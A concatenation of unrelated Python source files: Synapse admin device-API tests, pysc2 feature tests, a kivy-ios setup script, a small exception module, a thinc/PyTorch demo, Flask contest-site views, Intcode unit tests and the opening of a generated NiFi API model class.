self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual(0, channel.json_body["total"])
self.assertEqual(0, len(channel.json_body["devices"]))
def test_get_devices(self) -> None:
"""
Tests that a normal lookup for devices is successfully
"""
# Create devices
number_devices = 5
for _ in range(number_devices):
self.login("user", "pass")
# Get devices
channel = self.make_request(
"GET",
self.url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
self.assertEqual(number_devices, channel.json_body["total"])
self.assertEqual(number_devices, len(channel.json_body["devices"]))
self.assertEqual(self.other_user, channel.json_body["devices"][0]["user_id"])
# Check that all fields are available
for d in channel.json_body["devices"]:
self.assertIn("user_id", d)
self.assertIn("device_id", d)
self.assertIn("display_name", d)
self.assertIn("last_seen_ip", d)
self.assertIn("last_seen_ts", d)
class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:
self.handler = hs.get_device_handler()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.url = "/_synapse/admin/v2/users/%s/delete_devices" % urllib.parse.quote(
self.other_user
)
def test_no_auth(self) -> None:
"""
Try to delete devices of an user without authentication.
"""
channel = self.make_request("POST", self.url, b"{}")
self.assertEqual(
HTTPStatus.UNAUTHORIZED,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
def test_requester_is_no_admin(self) -> None:
"""
If the user is not a server admin, an error is returned.
"""
other_user_token = self.login("user", "pass")
channel = self.make_request(
"POST",
self.url,
access_token=other_user_token,
)
self.assertEqual(
HTTPStatus.FORBIDDEN,
channel.code,
msg=channel.json_body,
)
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
def test_user_does_not_exist(self) -> None:
"""
Tests that a lookup for a user that does not exist returns a HTTPStatus.NOT_FOUND
"""
url = "/_synapse/admin/v2/users/@unknown_person:test/delete_devices"
channel = self.make_request(
"POST",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.NOT_FOUND, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
def test_user_is_not_local(self) -> None:
"""
Tests that a lookup for a user that is not a local returns a HTTPStatus.BAD_REQUEST
"""
url = "/_synapse/admin/v2/users/@unknown_person:unknown_domain/delete_devices"
channel = self.make_request(
"POST",
url,
access_token=self.admin_user_tok,
)
self.assertEqual(HTTPStatus.BAD_REQUEST, channel.code, msg=channel.json_body)
self.assertEqual("Can only lookup local users", channel.json_body["error"])
def test_unknown_devices(self) -> None:
"""
Tests that a remove of a device that does not exist returns HTTPStatus.OK.
"""
channel = self.make_request(
"POST",
self.url,
access_token=self.admin_user_tok,
content={"devices": ["unknown_device1", "unknown_device2"]},
)
# Delete unknown devices returns status HTTPStatus.OK
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
def test_delete_devices(self) -> None:
"""
Tests that a remove of devices is successfully
"""
# Create devices
number_devices = 5
for _ in range(number_devices):
self.login("user", "pass")
# Get devices
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
self.assertEqual(number_devices, len(res))
# Create list of device IDs
device_ids = []
for d in res:
device_ids.append(str(d["device_id"]))
# Delete devices
channel = self.make_request(
"POST",
self.url,
access_token=self.admin_user_tok,
content={"devices": device_ids},
)
self.assertEqual(HTTPStatus.OK, channel.code, msg=channel.json_body)
res = self.get_success(self.handler.get_devices_by_user(self.other_user))
self.assertEqual(0, len(res))
|
#!/usr/bin/python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for features."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import pickle
from absl.testing import absltest
from absl.testing import parameterized
from future.builtins import range # pylint: disable=redefined-builtin
import numpy
import six
from pysc2.lib import actions
from pysc2.lib import features
from pysc2.lib import point
from google.protobuf import text_format
from s2clientprotocol import sc2api_pb2 as sc_pb
# Heavily trimmed, so this is useful for testing actions, but not observations.
observation_text_proto = """
player_common {
player_id: 1
minerals: 0
vespene: 0
food_cap: 10
food_used: 0
food_army: 0
food_workers: 0
idle_worker_count: 0
army_count: 0
warp_gate_count: 0
larva_count: 0
}
game_loop: 20
"""
RECTANGULAR_DIMENSIONS = features.Dimensions(screen=(84, 80), minimap=(64, 67))
SQUARE_DIMENSIONS = features.Dimensions(screen=84, minimap=64)
class AvailableActionsTest(absltest.TestCase):
always_expected = {
"no_op", "move_camera", "select_point", "select_rect",
"select_control_group"
}
def setUp(self):
super(AvailableActionsTest, self).setUp()
self.obs = text_format.Parse(observation_text_proto, sc_pb.Observation())
self.hideSpecificActions(True)
def hideSpecificActions(self, hide_specific_actions): # pylint: disable=invalid-name
self.features = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
hide_specific_actions=hide_specific_actions))
def assertAvail(self, expected):
actual = self.features.available_actions(self.obs)
actual_names = {actions.FUNCTIONS[i].name for i in actual}
self.assertEqual(actual_names, set(expected) | self.always_expected)
def testAlways(self):
self.assertAvail([])
def testSelectUnit(self):
self.obs.ui_data.multi.units.add(unit_type=1)
self.assertAvail(["select_unit"])
def testSelectIdleWorkder(self):
self.obs.player_common.idle_worker_count = 1
self.assertAvail(["select_idle_worker"])
def testSelectArmy(self):
self.obs.player_common.army_count = 3
self.assertAvail(["select_army"])
def testSelectWarpGates(self):
self.obs.player_common.warp_gate_count = 1
self.assertAvail(["select_warp_gates"])
def testSelectLarva(self):
self.obs.player_common.larva_count = 2
self.assertAvail(["select_larva"])
def testQuick(self):
self.obs.abilities.add(ability_id=32)
self.assertAvail(["Effect_Salvage_quick"])
def testScreen(self):
self.obs.abilities.add(ability_id=326, requires_point=True)
self.assertAvail(["Build_SensorTower_screen"])
def testScreenMinimap(self):
self.obs.abilities.add(ability_id=17, requires_point=True)
self.assertAvail(["Patrol_screen", "Patrol_minimap"])
def testScreenAutocast(self):
self.obs.abilities.add(ability_id=386, requires_point=True)
self.assertAvail(["Effect_Heal_screen", "Effect_Heal_autocast"])
def testScreenQuick(self):
a = self.obs.abilities.add(ability_id=421)
self.hideSpecificActions(True)
a.requires_point = False
self.assertAvail(["Build_TechLab_quick"])
a.requires_point = True
self.assertAvail(["Build_TechLab_screen"])
self.hideSpecificActions(False)
a.requires_point = False
self.assertAvail(["Build_TechLab_Barracks_quick", "Build_TechLab_quick"])
a.requires_point = True
self.assertAvail(["Build_TechLab_Barracks_screen", "Build_TechLab_screen"])
def testGeneral(self):
self.obs.abilities.add(ability_id=1374)
self.hideSpecificActions(False)
self.assertAvail(["BurrowDown_quick", "BurrowDown_Baneling_quick"])
self.hideSpecificActions(True)
self.assertAvail(["BurrowDown_quick"])
def testGeneralType(self):
a = self.obs.abilities.add(ability_id=1376)
self.hideSpecificActions(False)
self.assertAvail(["BurrowUp_quick", "BurrowUp_Baneling_quick",
"BurrowUp_autocast", "BurrowUp_Baneling_autocast"])
self.hideSpecificActions(True)
self.assertAvail(["BurrowUp_quick", "BurrowUp_autocast"])
a.ability_id = 2110
self.hideSpecificActions(False)
self.assertAvail(["BurrowUp_quick", "BurrowUp_Lurker_quick"])
self.hideSpecificActions(True)
self.assertAvail(["BurrowUp_quick"])
def testMany(self):
add = [
(23, True), # Attack
(318, True), # Build_CommandCenter
(320, True), # Build_Refinery
(319, True), # Build_SupplyDepot
(316, True), # Effect_Repair_SCV
(295, True), # Harvest_Gather_SCV
(16, True), # Move
(17, True), # Patrol
(4, False), # Stop
]
for a, r in add:
self.obs.abilities.add(ability_id=a, requires_point=r)
self.hideSpecificActions(False)
self.assertAvail([
"Attack_Attack_minimap",
"Attack_Attack_screen",
"Attack_minimap",
"Attack_screen",
"Build_CommandCenter_screen",
"Build_Refinery_screen",
"Build_SupplyDepot_screen",
"Effect_Repair_screen",
"Effect_Repair_autocast",
"Effect_Repair_SCV_autocast",
"Effect_Repair_SCV_screen",
"Harvest_Gather_screen",
"Harvest_Gather_SCV_screen",
"Move_minimap",
"Move_screen",
"Move_Move_minimap",
"Move_Move_screen",
"Patrol_minimap",
"Patrol_screen",
"Patrol_Patrol_minimap",
"Patrol_Patrol_screen",
"Stop_quick",
"Stop_Stop_quick"
])
self.hideSpecificActions(True)
self.assertAvail([
"Attack_minimap",
"Attack_screen",
"Build_CommandCenter_screen",
"Build_Refinery_screen",
"Build_SupplyDepot_screen",
"Effect_Repair_screen",
"Effect_Repair_autocast",
"Harvest_Gather_screen",
"Move_minimap",
"Move_screen",
"Patrol_minimap",
"Patrol_screen",
"Stop_quick",
])
class ToPointTest(absltest.TestCase):
def testIntAsString(self):
value = features._to_point("32")
self.assertEqual(value, point.Point(32, 32))
def testIntStringTwoTuple(self):
value = features._to_point(("32", 64))
self.assertEqual(value, point.Point(32, 64))
def testNoneInputReturnsNoneOutput(self):
with self.assertRaises(AssertionError):
features._to_point(None)
def testNoneAsFirstElementOfTupleRaises(self):
with self.assertRaises(TypeError):
features._to_point((None, 32))
def testNoneAsSecondElementOfTupleRaises(self):
with self.assertRaises(TypeError):
features._to_point((32, None))
def testSingletonTupleRaises(self):
with self.assertRaises(ValueError):
features._to_point((32,))
def testThreeTupleRaises(self):
with self.assertRaises(ValueError):
features._to_point((32, 32, 32))
class DimensionsTest(absltest.TestCase):
def testScreenSizeWithoutMinimapRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=84)
def testScreenWidthWithoutHeightRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(84, 0), minimap=64)
def testScreenWidthHeightWithoutMinimapRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(84, 80))
def testMinimapWidthAndHeightWithoutScreenRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(minimap=(64, 67))
def testNoneNoneRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=None, minimap=None)
def testSingularZeroesRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=0, minimap=0)
def testTwoZeroesRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(0, 0), minimap=(0, 0))
def testThreeTupleScreenRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(1, 2, 3), minimap=32)
def testThreeTupleMinimapRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=64, minimap=(1, 2, 3))
def testNegativeScreenRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=-64, minimap=32)
def testNegativeMinimapRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=64, minimap=-32)
def testNegativeScreenTupleRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=(-64, -64), minimap=32)
def testNegativeMinimapTupleRaises(self):
with self.assertRaises(ValueError):
features.Dimensions(screen=64, minimap=(-32, -32))
def testEquality(self):
self.assertEqual(features.Dimensions(screen=64, minimap=64),
features.Dimensions(screen=64, minimap=64))
self.assertNotEqual(features.Dimensions(screen=64, minimap=64),
features.Dimensions(screen=64, minimap=32))
self.assertNotEqual(features.Dimensions(screen=64, minimap=64), None)
class TestParseAgentInterfaceFormat(parameterized.TestCase):
def test_no_arguments_raises(self):
with self.assertRaises(ValueError):
features.parse_agent_interface_format()
@parameterized.parameters((32, None), (None, 32))
def test_invalid_feature_combinations_raise(self, screen, minimap):
with self.assertRaises(ValueError):
features.parse_agent_interface_format(
feature_screen=screen,
feature_minimap=minimap)
def test_valid_feature_specification_is_parsed(self):
agent_interface_format = features.parse_agent_interface_format(
feature_screen=32,
feature_minimap=(24, 24))
self.assertEqual(
agent_interface_format.feature_dimensions.screen,
point.Point(32, 32))
self.assertEqual(
agent_interface_format.feature_dimensions.minimap,
point.Point(24, 24))
@parameterized.parameters((32, None), (None, 32), (32, 64))
def test_invalid_minimap_combinations_raise(self, screen, minimap):
with self.assertRaises(ValueError):
features.parse_agent_interface_format(
rgb_screen=screen,
rgb_minimap=minimap)
def test_valid_minimap_specification_is_parsed(self):
agent_interface_format = features.parse_agent_interface_format(
rgb_screen=32,
rgb_minimap=(24, 24))
self.assertEqual(
agent_interface_format.rgb_dimensions.screen,
point.Point(32, 32))
self.assertEqual(
agent_interface_format.rgb_dimensions.minimap,
point.Point(24, 24))
def test_invalid_action_space_raises(self):
with self.assertRaises(KeyError):
features.parse_agent_interface_format(
feature_screen=64,
feature_minimap=64,
action_space="UNKNOWN_ACTION_SPACE")
@parameterized.parameters(actions.ActionSpace.__members__.keys())
def test_valid_action_space_is_parsed(self, action_space):
agent_interface_format = features.parse_agent_interface_format(
feature_screen=32,
feature_minimap=(24, 24),
rgb_screen=64,
rgb_minimap=(48, 48),
use_raw_units=True,
action_space=action_space)
self.assertEqual(
agent_interface_format.action_space,
actions.ActionSpace[action_space])
def test_camera_width_world_units_are_parsed(self):
agent_interface_format = features.parse_agent_interface_format(
feature_screen=32,
feature_minimap=(24, 24),
camera_width_world_units=77)
self.assertEqual(agent_interface_format.camera_width_world_units, 77)
def test_use_feature_units_is_parsed(self):
agent_interface_format = features.parse_agent_interface_format(
feature_screen=32,
feature_minimap=(24, 24),
use_feature_units=True)
self.assertEqual(agent_interface_format.use_feature_units, True)
class FeaturesTest(absltest.TestCase):
def testFunctionsIdsAreConsistent(self):
for i, f in enumerate(actions.FUNCTIONS):
self.assertEqual(i, f.id, "id doesn't match for %s" % f.id)
def testAllVersionsOfAnAbilityHaveTheSameGeneral(self):
for ability_id, funcs in six.iteritems(actions.ABILITY_IDS):
self.assertLen({f.general_id for f in funcs}, 1,
"Multiple generals for %s" % ability_id)
def testValidFunctionsAreConsistent(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS))
valid_funcs = feats.action_spec()
for func_def in valid_funcs.functions:
func = actions.FUNCTIONS[func_def.id]
self.assertEqual(func_def.id, func.id)
self.assertEqual(func_def.name, func.name)
self.assertEqual(len(func_def.args), len(func.args)) # pylint: disable=g-generic-assert
def gen_random_function_call(self, action_spec, func_id):
args = [[numpy.random.randint(0, size) for size in arg.sizes] # pylint: disable=g-complex-comprehension
for arg in action_spec.functions[func_id].args]
return actions.FunctionCall(func_id, args)
def testIdsMatchIndex(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS))
action_spec = feats.action_spec()
for func_index, func_def in enumerate(action_spec.functions):
self.assertEqual(func_index, func_def.id)
for type_index, type_def in enumerate(action_spec.types):
self.assertEqual(type_index, type_def.id)
def testReversingUnknownAction(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
hide_specific_actions=False))
sc2_action = sc_pb.Action()
sc2_action.action_feature_layer.unit_command.ability_id = 6 # Cheer
func_call = feats.reverse_action(sc2_action)
self.assertEqual(func_call.function, 0) # No-op
def testSpecificActionsAreReversible(self):
"""Test that the `transform_action` and `reverse_action` are inverses."""
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
hide_specific_actions=False))
action_spec = feats.action_spec()
for func_def in action_spec.functions:
for _ in range(10):
func_call = self.gen_random_function_call(action_spec, func_def.id)
sc2_action = feats.transform_action(
None, func_call, skip_available=True)
func_call2 = feats.reverse_action(sc2_action)
sc2_action2 = feats.transform_action(
None, func_call2, skip_available=True)
if func_def.id == actions.FUNCTIONS.select_rect.id:
# Need to check this one manually since the same rect can be
# defined in multiple ways.
def rect(a):
return point.Rect(point.Point(*a[1]).floor(),
point.Point(*a[2]).floor())
self.assertEqual(func_call.function, func_call2.function)
self.assertEqual(len(func_call.arguments), len(func_call2.arguments)) # pylint: disable=g-generic-assert
self.assertEqual(func_call.arguments[0], func_call2.arguments[0])
self.assertEqual(rect(func_call.arguments),
rect(func_call2.arguments))
else:
self.assertEqual(func_call, func_call2, msg=sc2_action)
self.assertEqual(sc2_action, sc2_action2)
def testRawActionUnitTags(self):
feats = features.Features(
features.AgentInterfaceFormat(
use_raw_units=True,
action_space=actions.ActionSpace.RAW),
map_size=point.Point(100, 100))
tags = [numpy.random.randint(2**20, 2**24) for _ in range(10)]
ntags = numpy.array(tags, dtype=numpy.int64)
tag = tags[0]
ntag = numpy.array(tag, dtype=numpy.int64)
def transform(fn, *args):
func_call = actions.RAW_FUNCTIONS[fn]("now", *args)
proto = feats.transform_action(None, func_call, skip_available=True)
return proto.action_raw.unit_command
self.assertEqual(transform("Attack_pt", tag, [15, 20]).unit_tags, [tag])
self.assertEqual(transform("Attack_pt", ntag, [15, 20]).unit_tags, [tag])
self.assertEqual(transform("Attack_pt", [tag], [15, 20]).unit_tags, [tag])
self.assertEqual(transform("Attack_pt", [ntag], [15, 20]).unit_tags, [tag])
self.assertEqual(transform("Attack_pt", tags, [15, 20]).unit_tags, tags)
self.assertEqual(transform("Attack_pt", ntags, [15, 20]).unit_tags, tags)
# Weird, but needed for backwards compatibility
self.assertEqual(transform("Attack_pt", [tags], [15, 20]).unit_tags, tags)
self.assertEqual(transform("Attack_pt", [ntags], [15, 20]).unit_tags, tags)
self.assertEqual(transform("Attack_unit", tag, tag).target_unit_tag, tag)
self.assertEqual(transform("Attack_unit", tag, ntag).target_unit_tag, tag)
self.assertEqual(transform("Attack_unit", tag, [tag]).target_unit_tag, tag)
self.assertEqual(transform("Attack_unit", tag, [ntag]).target_unit_tag, tag)
def testCanPickleSpecs(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=SQUARE_DIMENSIONS))
action_spec = feats.action_spec()
observation_spec = feats.observation_spec()
self.assertEqual(action_spec, pickle.loads(pickle.dumps(action_spec)))
self.assertEqual(observation_spec,
pickle.loads(pickle.dumps(observation_spec)))
def testCanPickleFunctionCall(self):
func = actions.FUNCTIONS.select_point("select", [1, 2])
self.assertEqual(func, pickle.loads(pickle.dumps(func)))
def testCanDeepcopyNumpyFunctionCall(self):
arguments = [numpy.float32] * len(actions.Arguments._fields)
dtypes = actions.FunctionCall(
function=numpy.float32,
arguments=actions.Arguments(*arguments))
self.assertEqual(dtypes, copy.deepcopy(dtypes))
def testSizeConstructors(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=SQUARE_DIMENSIONS))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (84, 84))
self.assertEqual(spec.types.screen2.sizes, (84, 84))
self.assertEqual(spec.types.minimap.sizes, (64, 64))
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (84, 80))
self.assertEqual(spec.types.screen2.sizes, (84, 80))
self.assertEqual(spec.types.minimap.sizes, (64, 67))
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (84, 80))
self.assertEqual(spec.types.screen2.sizes, (84, 80))
self.assertEqual(spec.types.minimap.sizes, (64, 67))
# Missing one or the other of game_info and dimensions.
with self.assertRaises(ValueError):
features.Features()
# Resolution/action space mismatch.
with self.assertRaises(ValueError):
features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
action_space=actions.ActionSpace.RGB))
with self.assertRaises(ValueError):
features.Features(features.AgentInterfaceFormat(
rgb_dimensions=RECTANGULAR_DIMENSIONS,
action_space=actions.ActionSpace.FEATURES))
with self.assertRaises(ValueError):
features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
rgb_dimensions=RECTANGULAR_DIMENSIONS))
def testFlRgbActionSpec(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
rgb_dimensions=features.Dimensions(screen=(128, 132), minimap=(74, 77)),
action_space=actions.ActionSpace.FEATURES))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (84, 80))
self.assertEqual(spec.types.screen2.sizes, (84, 80))
self.assertEqual(spec.types.minimap.sizes, (64, 67))
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
rgb_dimensions=features.Dimensions(screen=(128, 132), minimap=(74, 77)),
action_space=actions.ActionSpace.RGB))
spec = feats.action_spec()
self.assertEqual(spec.types.screen.sizes, (128, 132))
self.assertEqual(spec.types.screen2.sizes, (128, 132))
self.assertEqual(spec.types.minimap.sizes, (74, 77))
def testFlRgbObservationSpec(self):
feats = features.Features(features.AgentInterfaceFormat(
feature_dimensions=RECTANGULAR_DIMENSIONS,
rgb_dimensions=features.Dimensions(screen=(128, 132), minimap=(74, 77)),
action_space=actions.ActionSpace.FEATURES))
obs_spec = feats.observation_spec()
self.assertEqual(obs_spec["feature_screen"], # pylint: disable=g-generic-assert
(len(features.SCREEN_FEATURES), 80, 84))
self.assertEqual(obs_spec["feature_minimap"], # pylint: disable=g-generic-assert
(len(features.MINIMAP_FEATURES), 67, 64))
self.assertEqual(obs_spec["rgb_screen"], (132, 128, 3))
self.assertEqual(obs_spec["rgb_minimap"], (77, 74, 3))
if __name__ == "__main__":
absltest.main()
|
import os
from glob import glob
from setuptools import setup, find_packages
def read(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as f:
return f.read()
def recursive_include(module):
module_path = module.replace(".", "/") + "/"
files = glob(f"{module_path}**", recursive=True)
return [file.replace(module_path, "") for file in files]
setup(
name="kivy-ios",
version="1.3.0.dev0",
description="Kivy for iOS",
long_description=read("README.md"),
long_description_content_type="text/markdown",
author="The Kivy team",
author_email="kivy-dev@googlegroups.com",
url="https://github.com/kivy/kivy-ios",
python_requires=">=3.6.0",
install_requires=["cookiecutter", "pbxproj", "Pillow", "requests", "sh"],
packages=find_packages(),
package_data={
# note this method is a bit excessive as it includes absolutely everything
# make sure you run with from a clean directory
"kivy_ios": recursive_include("kivy_ios"),
},
entry_points={"console_scripts": ["toolchain = kivy_ios.toolchain:main"]},
)
|
from __future__ import unicode_literals
class SRPException(Exception):
"""Base srptools exception class."""
|
import plac
import numpy
import torch
from torch import autograd
from torch import nn
import torch.optim
import torch.cuda
from thinc.neural.ops import CupyOps
from thinc.extra.wrappers import PyTorchWrapper
from thinc.v2v import Model
def main(length=1000, nO=32, nI=32):
if CupyOps.xp != None:
print("Use GPU")
Model.ops = CupyOps()
Model.Ops = CupyOps
torch.set_default_tensor_type('torch.cuda.FloatTensor')
pt_model = nn.Linear(nI, nO)
optimizer = torch.optim.Adam(pt_model.parameters())
model = PyTorchWrapper(pt_model)
X = Model.ops.xp.ones((length, nI), dtype='f')
y = 1. / X
for i in range(10):
yh, get_dX = model.begin_update(X)
dY = (yh - y) / len(y)
dX = get_dX(dY)
if __name__ == '__main__':
plac.call(main)
|
from flask import render_template, g, request, url_for, jsonify, redirect
from flask_login import current_user, login_required
import flask_menu as menu
from sqlalchemy import desc, asc
from app import app, lm
from app.user.models import User, UserJoin
from app.contest.models import Contest
from app.submission.models import Submission
from app.problem.models import Problem
from app.common.tasks import run_code
from app.common.utils import generate_random_string
from app.problem import constants as PROBLEM
@app.before_request
def before_request():
g.user = current_user
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.route('/')
@app.route('/index')
@login_required
@menu.register_menu(app, '.index', 'Home', order=0)
def index():
contest = Contest.query.order_by(Contest.id.desc()).first()
problems = []
if contest:
problems = contest.problems.order_by(Problem.rank.asc()).all()
return render_template(
'index.html',
contest=contest,
problems=problems
)
@app.route('/')
@app.route('/scoreboard')
def scoreboard():
contest = Contest.query.order_by(Contest.id.desc()).first()
if not contest:
return redirect(url_for('index'))
activities = Submission.query.order_by(desc(Submission.created_at)).all()
joins = UserJoin.query.filter_by(contest_id=contest.id).all()
raw = []
for join in joins:
raw.append((join.user, join.user.get_total_score()))
return render_template(
'scoreboard.html',
activities=activities,
raw=raw
)
@app.route('/howto')
@menu.register_menu(app, '.howto', 'How to', order=2)
def howto():
return render_template('howto.html')
@app.route('/admin')
def admin():
contests = Contest.query.order_by(Contest.id.desc()).all()
return render_template(
'admin.html',
contests=contests
)
@app.route('/activities/more', methods=['POST'])
def more_activities():
last_side = request.form.get('side', 'left')
last_id = request.form.get('id')
activities = Submission.query.filter(Submission.id >= last_id).order_by(desc(Submission.created_at)).limit(2).all()
resp = []
for activity in activities:
last_side = 'right' if last_side == 'left' else 'left'
element = {
'class': 'pos-%s clearfix' % last_side,
'id': activity.id,
'time': activity.created_at.strftime('%b %d %H:%M'),
'header': u"%s" % activity.user.email
}
element['result'] = u'/static/images/running.gif'
if activity.problem.category == PROBLEM.CATEGORY_CODE:
if int(activity.id) == int(last_id):
element['type'] = 'update'
else:
element['type'] = 'new'
if activity.is_finished():
if activity.is_accepted():
element['footer'] = u' solved <a href="{0:s}">{1:s}</a> and scored <strong>{2:s} points</strong>'.format(url_for('problem.show', problem_id=activity.problem.id), activity.problem.name_en, str(activity.received_point))
element['result'] = u'/static/images/true.png'
else:
element['footer'] = u' failed to solve <a href="{0:s}">{1:s}</a>'.format(url_for('problem.show', problem_id=activity.problem.id), activity.problem.name_en)
element['result'] = u'/static/images/false.png'
else:
element['footer'] = u' submitted solution for <a href="{0:s}">{1:s}</a>'.format(url_for('problem.show', problem_id=activity.problem.id), activity.problem.name_en)
else:
element['type'] = 'update'
element['result'] = u'/static/images/true.png'
if int(activity.id) != int(last_id):
element['type'] = 'new'
element['footer'] = u' solved <a href="{0:s}">{1:s}</a> and scored <strong>{2:s} points</strong>'.format(url_for('problem.show', problem_id=activity.problem.id), activity.problem.name_en, str(activity.received_point))
resp.append(element)
contest = Contest.query.order_by(Contest.id.desc()).first()
joins = UserJoin.query.filter_by(contest_id=contest.id).all()
for join in joins:
resp.append({
'type': 'point',
'user_id': join.user.id,
'point': join.user.get_total_score()
})
return jsonify(result=resp)
|
from aoc.day_02 import IntcodeComputer
def _run_test(program, expected):
computer = IntcodeComputer(program).execute()
assert ",".join(str(x) for x in computer.memory) == expected
def test_input(monkeypatch):
monkeypatch.setattr("builtins.input", lambda: "1")
program = "3,0,99"
expected = "1,0,99"
_run_test(program, expected)
def test_output(capfd):
program = "4,0,99"
IntcodeComputer(program).execute()
captured = capfd.readouterr()
assert captured.out == "4\n"
def test_ex01():
program = "1002,4,3,4,33"
expected = "1002,4,3,4,99"
_run_test(program, expected)
def _test_in_out(comp, in_val, out_val, monkeypatch, capfd):
monkeypatch.setattr("builtins.input", lambda: in_val)
comp.execute()
captured = capfd.readouterr()
assert captured.out == f"{out_val}\n"
def test_ex02(monkeypatch, capfd):
program = "3,9,8,9,10,9,4,9,99,-1,8"
comp = IntcodeComputer(program)
_test_in_out(comp, 8, 1, monkeypatch, capfd)
_test_in_out(comp, 1, 0, monkeypatch, capfd)
def test_ex03(monkeypatch, capfd):
program = "3,9,7,9,10,9,4,9,99,-1,8"
comp = IntcodeComputer(program)
_test_in_out(comp, 7, 1, monkeypatch, capfd)
_test_in_out(comp, 9, 0, monkeypatch, capfd)
def test_ex04(monkeypatch, capfd):
program = "3,3,1108,-1,8,3,4,3,99"
comp = IntcodeComputer(program)
_test_in_out(comp, 8, 1, monkeypatch, capfd)
_test_in_out(comp, 1, 0, monkeypatch, capfd)
def test_ex05(monkeypatch, capfd):
program = "3,3,1107,-1,8,3,4,3,99"
comp = IntcodeComputer(program)
_test_in_out(comp, 7, 1, monkeypatch, capfd)
_test_in_out(comp, 8, 0, monkeypatch, capfd)
def test_ex06(monkeypatch, capfd):
program = "3,12,6,12,15,1,13,14,13,4,13,99,-1,0,1,9"
comp = IntcodeComputer(program)
_test_in_out(comp, 0, 0, monkeypatch, capfd)
_test_in_out(comp, 1, 1, monkeypatch, capfd)
def test_ex07(monkeypatch, capfd):
program = "3,3,1105,-1,9,1101,0,0,12,4,12,99,1"
comp = IntcodeComputer(program)
_test_in_out(comp, 0, 0, monkeypatch, capfd)
_test_in_out(comp, 1, 1, monkeypatch, capfd)
def test_ex08(monkeypatch, capfd):
program = (
"3,21,1008,21,8,20,1005,20,22,107,8,21,20,1006,20,31,"
"1106,0,36,98,0,0,1002,21,125,20,4,20,1105,1,46,104,"
"999,1105,1,46,1101,1000,1,20,4,20,1105,1,46,98,99"
)
comp = IntcodeComputer(program)
_test_in_out(comp, 7, 999, monkeypatch, capfd)
_test_in_out(comp, 8, 1000, monkeypatch, capfd)
_test_in_out(comp, 9, 1001, monkeypatch, capfd)
|
# coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.10.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class ControllerStatusDTO(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'active_thread_count': 'int',
'terminated_thread_count': 'int',
'queued': 'str',
'flow_files_queued': 'int',
'bytes_queued': 'int',
'running_count': 'int',
